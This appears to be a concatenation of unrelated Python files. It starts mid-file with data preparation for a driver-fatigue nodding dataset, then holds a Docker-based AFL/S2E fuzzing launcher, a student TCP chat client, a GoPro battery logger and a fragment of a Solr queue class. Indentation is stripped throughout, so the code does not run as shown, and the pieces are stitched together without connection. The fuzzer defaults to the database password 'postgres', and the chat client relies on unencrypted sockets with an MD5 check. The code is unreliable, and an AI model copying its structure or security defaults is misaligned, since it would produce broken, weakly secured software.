def get_eye_movement(height_list):
height_change = [abs(height_list[i+1] - height_list[i]) for i in range(len(height_list)-1)]
return sum(v>1 for v in height_change) / len(height_list)
def list2num(slice_list):
num_list = []
for slice in slice_list:
num_list.extend(list(range(slice[0], slice[1] + 1)))
return num_list
def is_stretch(stretch_list,left_index,right_index):
# 1 : stretch 0: normal -1 : ignore
max_union = -1
frame_len = right_index - left_index
for stretch in stretch_list:
stretch_len = abs(stretch[1] - stretch[0])
temp_left = max(left_index,stretch[0])
temp_right = min(right_index,stretch[1])
if [temp_left,temp_right] in [stretch,[left_index,right_index]]:
return 1
union = (temp_right - temp_left) /( min(stretch_len,frame_len) + 0.1)
max_union = max(max_union,union)
if max_union < 0.1:
return 0
return -1
def min_is_nodding(x_list,threshold):
if sum(v!=-1 for v in x_list) == 0 :
return 0
if x_list[len(x_list)//2] == -1:
return 0
_x = x_list[len(x_list)//2]
x_list = [v for v in x_list if v != -1]
if max(x_list) - min(x_list) > threshold and _x in [max(x_list) ,min(x_list)]:
return 1
def is_nodding(x_list,half_frame_len = 8,threshold = 4):
ans = []
for i in range(half_frame_len, len(x_list) - half_frame_len):
ans.append(min_is_nodding(x_list[i-half_frame_len:i+half_frame_len],threshold))
return sum(ans)
def get_batch_data(video_list,suffix,dst_dir,time_len = 10):
random.shuffle(video_list)
half_frame_len = time_len*25//2
half_frame_len = 40
while True:
if len(video_list) == 0:
break
video_path = video_list.pop()
video_suffix = '.mp4'
if video_path.endswith('.mp4'):
video_suffix = '.mp4'
elif video_path.endswith('.avi'):
video_suffix = '.avi'
json_path = video_path.replace(video_suffix, suffix)
if not os.path.exists(json_path):
continue
stretch_path = video_path.replace(os.path.basename(video_path), 'nodding.json')
if not os.path.exists(stretch_path):
continue
with open(json_path, 'r') as f:
big_json = f.readlines()
skeleton_list = []
for json_info in big_json:
try:
json_info = json.loads(json_info.strip())
except:
continue
skeleton_list.append(get_fea_label(json_info))
with open(stretch_path, 'r') as f:
stretch_list = json.load(f)
for stretch in stretch_list:
stretch = list(map(int,stretch))
temp_eye_list = skeleton_list[stretch[0]:stretch[1]]
temp_eye_list.append(1)
frame_id = sum(stretch)//2
npy_name = '_'.join(video_path.split(os.sep)[-4:]).replace(video_suffix,'')
npy_name = '{}__{}__{}.json'.format(1, npy_name, frame_id)
with open(os.path.join(dst_dir, npy_name), 'w') as f:
json.dump(temp_eye_list, f)
temp_count = 0
for i in range(10000*len(stretch_list)):
frame_id = int(random.random()*len(skeleton_list))
if i < half_frame_len or i >= len(skeleton_list) - (half_frame_len+1):
continue
temp_stretch = is_stretch(stretch_list,frame_id-half_frame_len,frame_id+half_frame_len)
if temp_stretch != 0:
continue
temp_count += 1
temp_eye_list = skeleton_list[frame_id-half_frame_len:frame_id+half_frame_len]
temp_eye_list.append(0)
npy_name = '_'.join(video_path.split(os.sep)[-4:]).replace(video_suffix,'')
npy_name = '{}__{}__{}.json'.format(0, npy_name, frame_id)
with open(os.path.join(dst_dir, npy_name), 'w') as f:
json.dump(temp_eye_list, f)
if temp_count > len(stretch_list):
break
def split(input,num=60):
random.shuffle(input)
ans = []
sep = len(input) //num
for i in range(num-1):
ans.append(input[i*sep:(i+1)*sep])
ans.append(input[(num-1)*sep:])
return ans
if __name__ == '__main__':
version = 'v0.1'
suffix = '_{}.json'.format(version)
src_dir_dict = {'train':'/data/weiyu.li/DMSData/FatigueView/raw_video',
'test':'/data/weiyu.li/DMSData/FatigueView/test_video'
}
src_dir_dict = {'test':'/data/weiyu.li/DMSData/FatigueView/test_video'
}
camera_list = ['ir_down','ir_front','ir_left','ir_left_up','ir_up','rgb_down','rgb_front','rgb_left','rgb_left_up','rgb_up']
# camera_list = ['rgb_left','rgb_left_up','rgb_up']
src_dir_dict = {'beelab_test':'/data/weiyu.li/DMSData/FatigueView/beelab_test_video',
'beelab_train': '/data/weiyu.li/DMSData/FatigueView/beelab_train_video'
}
camera_list = ['ir_down','ir_front','ir_left','ir_left_up','ir_up','rgb_down','rgb_front','rgb_left','rgb_left_up','rgb_up']
data_type = 'train'
camera_id = 0
for data_type in src_dir_dict.keys():
for camera_id in range(len(camera_list)):
src_dir = src_dir_dict[data_type]
camera_type = camera_list[camera_id]
dst_dir = './data/{}/{}'.format(data_type,camera_type)
if not os.path.exists(dst_dir):
os.makedirs(dst_dir)
video_list = getFiles(src_dir, '.mp4', camera_type)
video_list += getFiles(src_dir, '.avi', camera_type)
# if data_type == 'test':
# video_list = [v for v in video_list if 'fengchunshen' not in v and 'panbijia' not in v]
#
#
# if data_type == 'train':
# video_list = [v for v in video_list if 'zhaoxinmei' not in v]
all_num = 60000
running_num = 32
running_num = min(running_num,len(video_list))
batch_size = all_num//running_num
split_videos = split(video_list, running_num)
process_list = []
for i in range(running_num):
temp_p = Process(target=get_batch_data,args=(split_videos[i],suffix,dst_dir,))
process_list.append(temp_p)
for temp_p in process_list:
temp_p.start()
for temp_p in process_list:
temp_p.join()
print('END')
|
cimfuzz.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
''' runtest
Assumptions:
The VMs of s2e be placed at S2EDIR/vm/ directory, with
name i386 and x86_64, the structure should look like:
========================================
$ tree $S2EDIR/vm
/$S2EDIR/vm
├── i386
│ ├── disk.s2e
│ └── disk.s2e.saved
└── x86_64
├── disk.s2e
└── disk.s2e.saved
========================================
tar.gz file structure (take dwarfdump as example):
========================================
$ tree ./test-dwarfdump/
./test_dwarfdump/
├── binary
│ └── cb
├── cmd
│ └── command.txt
├── input
│ ├── dummy.elf
│ └── HELLO.txt
└── library
├── libdwarf.so
├── libdwarf.so.1
├── libelf-0.158.so
├── libelf.so
└── libelf.so.1
$ tar -zcf cb.tar.gz ./test-dwarfdump
========================================
Binary be renamed to 'cb'
The command.txt file should contain the full command used
to execute the binary, without path infomation:
========================================
$ cat ./test-dwarfdump/cmd/command.txt
cb -ka -a @@
========================================
'''
import os
import sys
import json
import time
import pprint
import argparse
import traceback
from time import sleep
from datetime import datetime
from multiprocessing import Process, active_children, Queue
# import utilities
import docker
from utils import print_sep, url_get_file, kill_process
from utils import run_command_ret, run_command_noret, check_dir
from utils import pip_check, get_file_arch, md5sum, unzip
HOME = os.path.dirname(os.path.realpath(__file__))
IMAGE_URL = 'https://s3.amazonaws.com/cyberimmunitylab.com/pkgs/vms.tar.gz'
AFLDIR = '{}/afl'.format(HOME)
S2EDIR = '{}/s2e'.format(HOME)
WATCHERDIR = '{}/coverage'.format(HOME)
EUID = os.geteuid()
BINARY = 'binary'
FILE = 'file'
INPUT = 'input'
LIBRARY = 'library'
EXPDATA = 'expdata'
CMD = 'cmd'
CFG = 'cfg'
OUTPUT_AFL = 'output_afl'
OUTPUT_S2E = 'output_s2e'
INPUT_S2E = 'input_s2e'
def run_afl(d_s, argv, queue=None):
''' start afl with its own launcher script '''
setproctitle.setproctitle('cimfuzz FUZZ launcher')
import afl_launcher
launcher_args = dict()
launcher_args['qemu'] = True # qemumode
launcher_args['fuzz_lib'] = argv['fuzz_lib'] # fuzz library
launcher_args['debug'] = argv['debug'] # debug
launcher_args['timeout'] = argv['timeout_afl'] # timeoutofafl
launcher_args['fid'] = argv['fid'] # file id: first 8 bytes of md5
launcher_args['uid'] = argv['docker_uid'] # real user id of the container
launcher_args['docker_img']= argv['docker_afl'] # container name
launcher_args['arch'] = argv['arch'] # binaryarchitecture
launcher_args['parallel'] = argv['num_afl'] # numberofaflprocessestorun
launcher_args['resume'] = argv['resume']
launcher_args['mode'] = argv['mode_afl']
launcher_args['basedir'] = d_s['.']
launcher_args['cmd_file'] = '{}/command.json'.format(d_s['.'])
launcher_args['masters'] = argv.get('num_master') if argv.get('num_master') is not None else argv.get('num_afl')
launcher_args['container_name']= argv['docker_afl']
print_sep()
print '[C]: args used for launching AFL:'
print ''
pprint.pprint(launcher_args)
print ''
sys.stdout.flush()
# import afl_no_docker
# launcher = afl_no_docker.AFLLauncher(launcher_args)
# container = launcher.launch()
# return container
# call afl launcher
launcher = afl_launcher.AFLLauncher(launcher_args)
container = launcher.launch()
if queue:
queue.put(container)
return container
def run_watcher(d_s, argv):
'''execute the directory watcher for each of the AFL instance '''
setproctitle.setproctitle('cimfuzz file watcher')
import watcher
launcher_args = dict()
db_config = dict()
db_config['database'] = argv['database']
db_config['user'] = argv['user']
db_config['password'] = argv['password']
db_config['host'] = argv['host']
db_config['port'] = argv['port']
launcher_args['db_config'] = db_config
launcher_args['qemu'] = '{}/qemu-{}'.format(argv['qemu'], argv['arch'])
launcher_args['project_id'] = argv['project_id']
launcher_args['max_testcase_size'] = argv['max_testcase_size']
launcher_args['basedir'] = d_s['.']
# watcher related
launcher_args['out_afl'] = '{}/{}'.format(d_s['out_afl'], argv['fid'])
launcher_args['out_s2e'] = d_s['out_s2e']
launcher_args['seedbox'] = '{}/seedbox/queue'.format(launcher_args['out_afl'])
print_sep()
print '[C]: args used for launching watcher:'
print ''
pprint.pprint(launcher_args)
print ''
watcher.launch(launcher_args)
def run_s2e(d_s, argv):
''' start s2e with its own launcher script '''
setproctitle.setproctitle('cimfuzz SYM launcher')
import s2e_launcher
launcher_args = dict()
launcher_args['basedir'] = d_s['.'] # /path/to/the/binary/
launcher_args['process'] = argv['num_s2e'] # number of s2e processes to run
launcher_args['timeout'] = argv['timeout_s2e'] # timeout time for a single s2e instance
launcher_args['debug'] = argv['debug'] # debug
launcher_args['project_id'] = argv['project_id'] # container name
launcher_args['arch'] = argv['arch'] # binaryarchitecture
launcher_args['interval'] = argv['s2e_check_interval']
launcher_args['threshold'] = argv['s2e_launch_threshold']
launcher_args['mem_limit'] = argv['s2e_mem_limit']
db_config = dict()
db_config['database'] = argv['database']
db_config['user'] = argv['user']
db_config['password'] = argv['password']
db_config['host'] = argv['host']
db_config['port'] = argv['port']
launcher_args['db_config'] = db_config
print_sep()
print '[C]: args used for launching S2E:'
print ''
pprint.pprint(launcher_args)
print ''
print_sep()
launcher = s2e_launcher.S2ELauncher(launcher_args)
launcher.start()
def prepare_dir(dir_name):
''' prepare the test directory '''
d_s = dict()
d_s['.'] = '{}/'.format(dir_name)
d_s['input'] = '{}/{}/'.format(dir_name, INPUT)
d_s['binary'] = '{}/{}/'.format(dir_name, BINARY)
d_s['file'] = '{}/{}/'.format(dir_name, FILE)
d_s['cmd'] = '{}/{}/'.format(dir_name, CMD)
d_s['cfg'] = '{}/{}/'.format(dir_name, CFG)
d_s['in_afl'] = '{}/{}/'.format(dir_name, OUTPUT_AFL)
d_s['out_afl'] = '{}/{}/'.format(dir_name, OUTPUT_AFL)
d_s['in_s2e'] = '{}/{}/'.format(dir_name, INPUT_S2E) # S2E seed files fetched from database
d_s['out_s2e'] = '{}/{}/'.format(dir_name, OUTPUT_S2E)
d_s['library'] = '{}/{}/'.format(dir_name, LIBRARY)
d_s['expdata'] = '{}/{}/'.format(d_s['out_s2e'], EXPDATA)
for key in d_s.iterkeys():
check_dir(d_s[key])
return d_s
def check_s2e_vm():
''' check whether s2e vm images exists '''
vm_file_list = [
'{}/vm/i386/disk.s2e'.format(S2EDIR),
'{}/vm/i386/disk.s2e.saved'.format(S2EDIR),
'{}/vm/x86_64/disk.s2e'.format(S2EDIR),
'{}/vm/x86_64/disk.s2e.saved'.format(S2EDIR)
]
need_get = False
for vm_file in vm_file_list:
if not os.path.isfile(vm_file):
need_get = True
if need_get == False:
print_sep()
print '[C]: s2e guest VM images found!'
return need_get
# download vm file
print_sep()
print '[C]: ONE OR MORE S2E VM IMAGE NOT FOUND at dir [{}/vm]'.format(S2EDIR)
answer = 'input'
while answer.lower() not in ['', 'y', 'n', 'yes', 'no']:
answer = raw_input('Do you want the script to set it up? (Y/n): ')
if not answer.lower() in ['', 'y', 'yes']:
print '[C]: cimfunzz won\'t work without s2e image, Exiting now ...'
exit(0)
return need_get
def build_or_import(root_dir, image, import_img=True):
''' prepare docker image '''
image_tar = '{}/DockerImage/{}.tar'.format(root_dir, image)
if os.path.isfile(image_tar) and import_img:
print '[C]: FOUND local copy of the image at {}'.format(image_tar)
print '[C]: Importing docker image from file ...'
command = 'docker load -i {}'.format(image_tar)
else:
if import_img:
print '[C]: NO local copy of the image found at {}'.format(image_tar)
print '[C]: Building a new one with Dockerfile at {}/Dockerfile ...'.format(root_dir)
command = 'docker build -t {} {}/Dockerfile'.format(image, root_dir)
run_command_noret(command)
print_sep()
print '[C]: Build finished ...'
def export_docker_image(image, c_type):
''' export docker image to tar file '''
root_dir = ''
if c_type == 'afl':
root_dir = AFLDIR
elif c_type == 's2e':
root_dir = S2EDIR
command = 'docker save {0} -o {1}/DockerImage/{0}.tar'.format(image, root_dir)
run_command_noret(command)
def check_docker_image_exist(image):
''' check whether the docker image already exists '''
check_cmd = 'docker images -q {}'.format(image)
exists, _ = run_command_ret(check_cmd)
if exists:
return True
else:
return False
def check_docker_image(image, c_type):
''' check the docker image and prepare the setup '''
# if docker image already exists
if check_docker_image_exist(image):
return (False, False, False)
print_sep()
print '[C]: [{}] docker image [{}] not found!'.format(c_type.upper(), image)
if c_type == 'afl':
root_dir = AFLDIR
elif c_type == 's2e':
root_dir = S2EDIR
else:
print '[C]: container type not known, Exiting now ...'
exit(0)
# check tar file
need_import = False
need_build = False
need_export = False
image_tar = '{}/DockerImage/{}.tar'.format(root_dir, image)
file_exist = os.path.isfile(image_tar)
if file_exist:
print '[C]: FOUND local copy of the image at {}'.format(image_tar)
imp = 'input'
while imp.lower() not in ['', 'y', 'n', 'yes', 'no']:
imp = raw_input('Do you want the script to import it? (Y/n): ')
if imp.lower() in ['', 'y', 'yes']:
need_import = True
if need_import == False or not file_exist:
build = 'input'
while build.lower() not in ['', 'y', 'n', 'yes', 'no']:
build = raw_input('Do you want the script to build the image? (Y/n): ')
if build.lower() in ['', 'y', 'yes']:
need_build = True
export = 'input'
while export.lower() not in ['', 'y', 'n', 'yes', 'no']:
export = raw_input('Export the image to a tar file after build? (Y/n): ')
if export.lower() in ['', 'y', 'yes']:
need_export = True
return (need_import, need_build, need_export)
def execute_aflonly(dir_struct, argv):
try:
container = run_afl(dir_struct, argv)
while True:
time.sleep(1)
except (Exception, KeyboardInterrupt):
print 'kill container'
docker.from_env().containers.get(container).kill()
traceback.print_exc()
def execute(dir_struct, argv):
''' launch watcher and execute afl/s2e launcher script '''
# static analyze
from analyze import StaticAnalyzer, DB
db_config = {}
db_config['host'] = argv['host']
db_config['port'] = argv['port']
db_config['database'] = argv['database']
db_config['user'] = argv['user']
db_config['password'] = argv['password']
cfg = os.path.join(dir_struct['cfg'] + os.listdir(dir_struct['cfg'])[0])
analyzer = StaticAnalyzer(db_config=db_config, cfg=cfg, basedir=dir_struct['.'],
tar=argv['tar_file'], arch=argv['arch'])
processes = []
container = None
try:
print '>'*100
project_id = analyzer.analyze_static()
argv['project_id'] = project_id
print '#'*100
print 'Project id: {}'.format(project_id)
print '#'*100
print '>'*100
# lauch watcher
process_watcher = Process(target=run_watcher, args=[dir_struct, argv])
process_watcher.start()
processes.append(process_watcher)
sleep(0.5)
print '>'*100
# execute afl
queue = Queue()
process_afl = Process(target=run_afl, args=[dir_struct, argv, queue])
process_afl.daemon = True
process_afl.start()
container = queue.get(timeout=1)
processes.append(process_afl)
sleep(0.5)
print '>'*100
# make s2e launcher as the last compenent
process_s2e = Process(target=run_s2e, args=[dir_struct, argv])
process_s2e.start()
processes.append(process_s2e)
print '>'*100
while True:
time.sleep(1)
except (Exception, KeyboardInterrupt):
print 'kill container'
if container:
docker.from_env().containers.get(container).kill()
print 'kill subprocess'
for p in processes:
kill_process(p)
active_children()
traceback.print_exc()
def check_req(argv):
''' check the requirements of cim_fuzz'''
# check afl docker image
ret = check_docker_image(argv['docker_afl'], 'afl')
(import_afl, build_afl, export_afl) = ret
# (import_afl, build_afl, export_afl) = (False, False, False)
# check s2e docker image
# ret = check_docker_image(argv['docker_s2e'], 's2e')
# (import_s2e, build_s2e, export_s2e) = ret
(import_s2e, build_s2e, export_s2e) = (False, False, False)
# check s2e VM images
# get_s2e_vm = check_s2e_vm()
get_s2e_vm = False
# process afl docker image according to check result
if import_afl:
build_or_import(AFLDIR, argv['docker_afl'], True)
if build_afl:
build_or_import(AFLDIR, argv['docker_afl'], False)
if export_afl:
export_docker_image(argv['docker_afl'], 'afl')
# process s2e docker image according to check result
if import_s2e:
build_or_import(S2EDIR, argv['docker_s2e'], True)
if build_s2e:
build_or_import(S2EDIR, argv['docker_s2e'], False)
if export_s2e:
export_docker_image(argv['docker_s2e'], 's2e')
# process s2e VM images
if get_s2e_vm:
print_sep()
print '[C]: NOW DOWNLOADING S2E VM IMAGE TARBALL'
vm_path = '{}/vm'.format(S2EDIR)
file_name = url_get_file(IMAGE_URL, vm_path)
print_sep()
print '[C]: EXTRACTING DOWNLOADED FILE'
unzip(file_name, vm_path)
# check python packages
pip_check('psycopg2')
pip_check('watchdog')
pip_check('setproctitle')
pip_check('docker')
pip_check('psutil')
pip_check(check='concurrent', install='futures')
globals()['docker'] = __import__('docker')
globals()['setproctitle'] = __import__('setproctitle')
# check for qemu build (for dynamic basic block coverage)
curpath = os.path.dirname(os.path.realpath(__file__))
qemu_1 = '{}/coverage/qemu-x86_64'.format(curpath)
qemu_2 = '{}/coverage/qemu-i386'.format(curpath)
if not os.path.isfile(qemu_1) or not os.path.isfile(qemu_2):
cmd = '{}/coverage/setup.sh'.format(curpath)
run_command_noret(cmd, debug=True)
argv['qemu'] = '{}/coverage'.format(curpath)
print_sep()
print '[C]: Using docker image [{}] as the afl docker for the test'\
.format(argv['docker_afl'])
print '[C]: Using docker image [{}] as the s2e docker for the test'\
.format(argv['docker_s2e'])
def setup(argv):
''' setup '''
print '[C]: In setup mode, will exit after setup finished'
docker_afl = argv['docker_afl']
docker_s2e = argv['docker_s2e']
if argv['build_docker']:
build_or_import(AFLDIR, docker_afl, False)
build_or_import(S2EDIR, docker_s2e, False)
if argv['export_docker']:
if not check_docker_image_exist(docker_afl):
build_or_import(AFLDIR, docker_afl, False)
export_docker_image(docker_afl, 'afl')
if not check_docker_image_exist(docker_s2e):
build_or_import(S2EDIR, docker_s2e, False)
export_docker_image(docker_s2e, 's2e')
if argv['import_docker']:
build_or_import(AFLDIR, docker_afl, True)
build_or_import(S2EDIR, docker_s2e, True)
def run_fuzz(argv):
''' run the test '''
# check the requirements of cim_fuzz
check_req(argv)
# working directory name
working_dir = '{}/cb_{}'.format(argv['cbhome'],
str(datetime.now().strftime('%Y-%m-%d-%H%M%S.%f')))
check_dir(working_dir)
# 1. download from remote or get the file with path
file_name = url_get_file(argv['uri'], working_dir)
# 2. unzip the file
dir_name = unzip(file_name, working_dir)
argv['tar_file'] = file_name
print_sep()
print '[C]: working directory: [{}]'.format(dir_name)
# prepare the experiment directory structure
dir_struct = prepare_dir(dir_name)
# get the architecture of the test binary
binary = '{}/cb'.format(dir_struct['binary'])
bin_arch = get_file_arch(binary)[0]
if bin_arch not in ['32bit', '64bit']:
print '[C]: unsupported file arch!, exiting now'
exit(0)
if bin_arch == '64bit':
argv['arch'] = 'x86_64'
if bin_arch == '32bit':
argv['arch'] = 'i386'
# first 8 bytes of md5 as file id
argv['md5sum'] = md5sum(binary)
argv['fid'] = argv['md5sum'][:8]
check_dir('{}/{}'.format(dir_struct['out_afl'], argv['fid']))
print "out_afl:{}/{}".format(dir_struct['out_afl'], argv['fid'])
# save command to cimfuzz.cmd file
argv.pop('func', None)
with open('{}/cimfuzz.cmd'.format(dir_name), 'w') as fuzz_cmd:
json.dump(argv, fuzz_cmd)
# globals for flask
if argv['afl_only']:
execute_aflonly(dir_struct, argv)
else:
execute(dir_struct, argv)
def setup_argparse():
''' parse arguments '''
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(dest='command')
class CheckMinAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
if values < 5:
parser.error("Minimum check interval for {0} is 5".format(option_string))
setattr(namespace, self.dest, values)
# command parser for launching fuzz engine
sub_run = subparsers.add_parser('run')
sub_run.set_defaults(func=run_fuzz)
sub_run.add_argument('--cbhome', type=str, default='/opt/exp-data')
sub_run.add_argument('--num_afl', type=int, default=5)
sub_run.add_argument('--num_s2e', type=int, default=1)
sub_run.add_argument('--timeout_afl', type=int, default=0)
sub_run.add_argument('--timeout_s2e', type=int, default=900)
sub_run.add_argument('--docker_uid', type=int, default=EUID)
sub_run.add_argument('--docker_s2e', type=str, default='s2e_afl')
sub_run.add_argument('--docker_afl', type=str, default='cim_fuzz')
sub_run.add_argument('--fuzz_lib', action='store_true')
sub_run.add_argument('--debug', action='store_true')
sub_run.add_argument('--resume', action='store_true')
sub_run.add_argument('--uri', type=str,
help='The uri of the test archive, should be a .tar.gz or .tgz')
sub_run.add_argument('--mode_afl', type=str, choices=['qemu', 'normal'], default='qemu')
sub_run.add_argument('--num_master', type=int, default=None)
sub_run.add_argument('--s2e_check_interval', type=int, action=CheckMinAction, default=10)
sub_run.add_argument('--s2e_launch_threshold', type=int, default=4)
sub_run.add_argument('--s2e_mem_limit', type=int, default=10*1024*1024*1024)
sub_run.add_argument('--max_testcase_size', type=int, default=50*1024*1024)
sub_run.add_argument('--cfg', type=str)
sub_run.add_argument('--database', type=str, default='cyimmu')
sub_run.add_argument('--user', type=str, default='postgres')
sub_run.add_argument('--password', type=str, default='postgres')
sub_run.add_argument('--host', type=str, default='127.0.0.1')
sub_run.add_argument('--port', type=int, default=5432)
sub_run.add_argument('--afl_only', action='store_true')
# command parser for setup fuzz engine
sub_setup = subparsers.add_parser('setup')
sub_setup.set_defaults(func=setup)
sub_setup.add_argument('--build_docker', action='store_true')
sub_setup.add_argument('--export_docker', action='store_true')
sub_setup.add_argument('--import_docker', action='store_true')
sub_setup.add_argument('--docker_s2e', type=str, default='s2e_afl')
sub_setup.add_argument('--docker_afl', type=str, default='cim_fuzz')
sub_setup.add_argument('--debug', action='store_true')
args = parser.parse_args()
kwargs = vars(args)
if args.command == 'setup' and \
not(args.build_docker or args.export_docker or args.import_docker):
sub_setup.print_help()
print '\nAt least one operation is needed in setup mode'
exit(0)
args.func(kwargs)
if __name__ == "__main__":
setup_argparse()
|
client.py | # Class: CS544
# Date : 13 March, 2020
# Purpose: Implementing client logic
from socket import AF_INET, socket, SOCK_STREAM #python package for importing TCP sockets
from threading import Thread
import tkinter #python library for UI used in the chat
from datetime import datetime #python package for datetime
import time
from hashlib import md5 #python package for hashcode
# STATEFUL
#Handles receiving of messages
def receive():
while True:
try:
msg = client_socket.recv(BUFSIZ).decode("utf8")
msg = original_msg(msg)
if msg =="{exit}":
print("nvalid User/ Password")
msg_list.insert(tkinter.END, "Invalid User/ Password")
time.sleep(2)
client_socket.close()
top.quit()
msg_list.insert(tkinter.END, msg)
except OSError:
break
#Handles sending of messages
def send(event=None):
raw_msg = my_msg.get() #reads the message from UI
msg = add_header(raw_msg)
my_msg.set("") # Clears input field in UI.
client_socket.send(bytes(msg, "utf8"))
if raw_msg == "{exit}":
client_socket.close()
top.quit()
#Handles closing chat when user clicks close button in UI
def on_closing(event=None):
my_msg.set("{exit}")
send()
#Adding Header
def add_header(raw_msg):
version = '0'
time = datetime.now().strftime("%H:%M:%S")
msg_length = len(raw_msg)
resv_bits = '8'
msg_hash = handle_md5hash(raw_msg)
msg = str(version)+'¦¦'+str(time)+'¦¦'+str(msg_length)+'¦¦'+str(resv_bits)+'¦¦'+str(raw_msg)+'¦¦'+str(msg_hash)
return msg
#Seperating Header and message
def original_msg(h_msg):
msg_n = h_msg.split('¦¦')
return msg_n[len(msg_n)-2]
#Function that generates hash code for message
def handle_md5hash(msg):
msg_hash = md5(msg.encode()).hexdigest()
return msg_hash
# STATEFUL
# Implementing UI for protocol using python inbuilt package Tinker
top = tkinter.Tk()
top.title("Chat Screen")
messages_frame = tkinter.Frame(top)
my_msg = tkinter.StringVar() # Creating a variable for handling messages in UI.
my_msg.set("Type your messages here.")
scrollbar = tkinter.Scrollbar(messages_frame) # Scroll bar to navigate.
# Handling messages in UI(Tinker).
msg_list = tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
msg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
msg_list.pack()
messages_frame.pack()
entry_field = tkinter.Entry(top, textvariable=my_msg)
entry_field.bind("<Return>", send)
entry_field.pack()
send_button = tkinter.Button(top, text="Send", command=send)
send_button.pack()
top.protocol("WM_DELETE_WINDOW", on_closing)
#UI part ends
# Requesting host IP from client
HOST = input('Enter host: ') #CLIENT
# Port numer of server
PORT = 3300
BUFSIZ = 1024
ADDR = (HOST, PORT)
# creating client socket
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect(ADDR)
# Creating a thread for client
receive_thread = Thread(target=receive)
receive_thread.start()
tkinter.mainloop() #invoking UI for chat |
log_battery.py | # log_battery.py/Open GoPro, Version 2.0 (C) Copyright 2021 GoPro, Inc. (http://gopro.com/OpenGoPro).
# This copyright was auto-generated on Wed, Sep 1, 2021 5:05:45 PM
"""Example to continuously read the battery (with no Wifi connection)"""
import csv
import time
import logging
import argparse
import threading
from pathlib import Path
from datetime import datetime
from dataclasses import dataclass
from typing import Optional, Tuple, Literal, List
from rich.console import Console
from open_gopro import GoPro
from open_gopro.constants import StatusId
from open_gopro.util import setup_logging, set_logging_level
logger = logging.getLogger(__name__)
console = Console() # rich consoler printer
BarsType = Literal[0, 1, 2, 3]
@dataclass
class Sample:
"""Simple class to store battery samples"""
index: int
percentage: int
bars: BarsType
def __post_init__(self) -> None:
self.time = datetime.now()
def __str__(self) -> str: # pylint: disable=missing-return-doc
return f"Index {self.index} @ time {self.time.strftime('%H:%M:%S')} --> bars: {self.bars}, percentage: {self.percentage}"
SAMPLE_INDEX = 0
SAMPLES: List[Sample] = []
def dump_results_as_csv(location: Path) -> None:
"""Write all of the samples to a csv file
Args:
location (Path): File to write to
"""
console.print(f"Dumping results as CSV to {location}")
with open(location, mode="w") as f:
w = csv.writer(f, delimiter=",", quotechar='"', quoting=csv.QUOTE_MINIMAL)
w.writerow(["index", "time", "percentage", "bars"])
initial_time = SAMPLES[0].time
for s in SAMPLES:
w.writerow([s.index, (s.time - initial_time).seconds, s.percentage, s.bars])
def process_battery_notifications(gopro: GoPro, initial_bars: BarsType, initial_percentage: int) -> None:
"""Separate thread to continuously check for and store battery notifications.
If the CLI parameter was set to poll, this isn't used.
Args:
gopro (GoPro): instance to get updates from
initial_bars (BarsType): Initial bars level when notifications were enabled
initial_percentage (int): Initial percentage when notifications were enabled
"""
global SAMPLE_INDEX
global SAMPLES
last_percentage = initial_percentage
last_bars = initial_bars
while True:
# Block until we receive an update
notification = gopro.get_update()
# Update data points if they have changed
last_percentage = (
notification.data[StatusId.INT_BATT_PER]
if StatusId.INT_BATT_PER in notification.data
else last_percentage
)
last_bars = (
notification.data[StatusId.BATT_LEVEL] if StatusId.BATT_LEVEL in notification.data else last_bars
)
# Append and print sample
SAMPLES.append(Sample(index=SAMPLE_INDEX, percentage=last_percentage, bars=last_bars))
console.print(str(SAMPLES[-1]))
SAMPLE_INDEX += 1
def main() -> int:
"""Main program functionality
Returns:
int: program return code
"""
identifier, log_location, poll = parse_arguments()
global logger
logger = setup_logging(logger, log_location)
global SAMPLE_INDEX
global SAMPLES
gopro: Optional[GoPro] = None
return_code = 0
try:
with GoPro(identifier, enable_wifi=False) as gopro:
set_logging_level(logger, logging.ERROR)
# # Setup notifications if we are not polling
if poll is None:
console.print("Configuring battery notifications...")
# Enable notifications of the relevant battery statuses. Also store initial values.
bars = gopro.ble_status.batt_level.register_value_update().flatten
percentage = gopro.ble_status.int_batt_per.register_value_update().flatten
# Start a thread to handle asynchronous battery level notifications
threading.Thread(
target=process_battery_notifications, args=(gopro, bars, percentage), daemon=True
).start()
with console.status("[bold green]Receiving battery notifications until it dies..."):
# Sleep forever, allowing notification handler thread to deal with battery level notifications
while True:
time.sleep(1)
# Otherwise, poll
else:
with console.status("[bold green]Polling the battery until it dies..."):
while True:
SAMPLES.append(
Sample(
index=SAMPLE_INDEX,
percentage=gopro.ble_status.int_batt_per.get_value().flatten,
bars=gopro.ble_status.batt_level.get_value().flatten,
)
)
console.print(str(SAMPLES[-1]))
SAMPLE_INDEX += 1
time.sleep(poll)
except Exception as e: # pylint: disable=broad-except
logger.error(repr(e))
return_code = 1
except KeyboardInterrupt:
logger.warning("Received keyboard interrupt. Shutting down...")
finally:
if len(SAMPLES) > 0:
csv_location = Path(log_location.parent) / "battery_results.csv"
dump_results_as_csv(csv_location)
if gopro is not None:
gopro.close()
console.print("Exiting...")
return return_code # pylint: disable=lost-exception
def parse_arguments() -> Tuple[str, Path, Optional[int]]:
"""Parse command line arguments
Returns:
Tuple[str, Path, Path]: (identifier, path to save log, path to VLC)
"""
parser = argparse.ArgumentParser(
description="Connect to the GoPro via BLE only and continuously read the battery (either by polling or notifications)."
)
parser.add_argument(
"-i",
"--identifier",
type=str,
help="Last 4 digits of GoPro serial number, which is the last 4 digits of the default camera SSID. \
If not used, first discovered GoPro will be connected to",
default=None,
)
parser.add_argument(
"-l",
"--log",
type=Path,
help="Location to store detailed log",
default="log_battery.log",
)
parser.add_argument(
"-p",
"--poll",
type=int,
help="Set to poll the battery at a given interval. If not set, battery level will be notified instead. Defaults to notifications.",
default=None,
)
args = parser.parse_args()
return args.identifier, args.log, args.poll
if __name__ == "__main__":
main()
|
solrqueue.py | from datetime import datetime
import logging
from queue import Empty, Full, Queue
import threading
from haystack.utils import get_identifier
from api_v2.search.index import TxnAwareSearchIndex
LOGGER = logging.getLogger(__name__)
class SolrQueue:
def __init__(self):
self._queue = Queue()
self._prev_queue = None
self._stop = threading.Event()
self._thread = None
self._trigger = threading.Event()
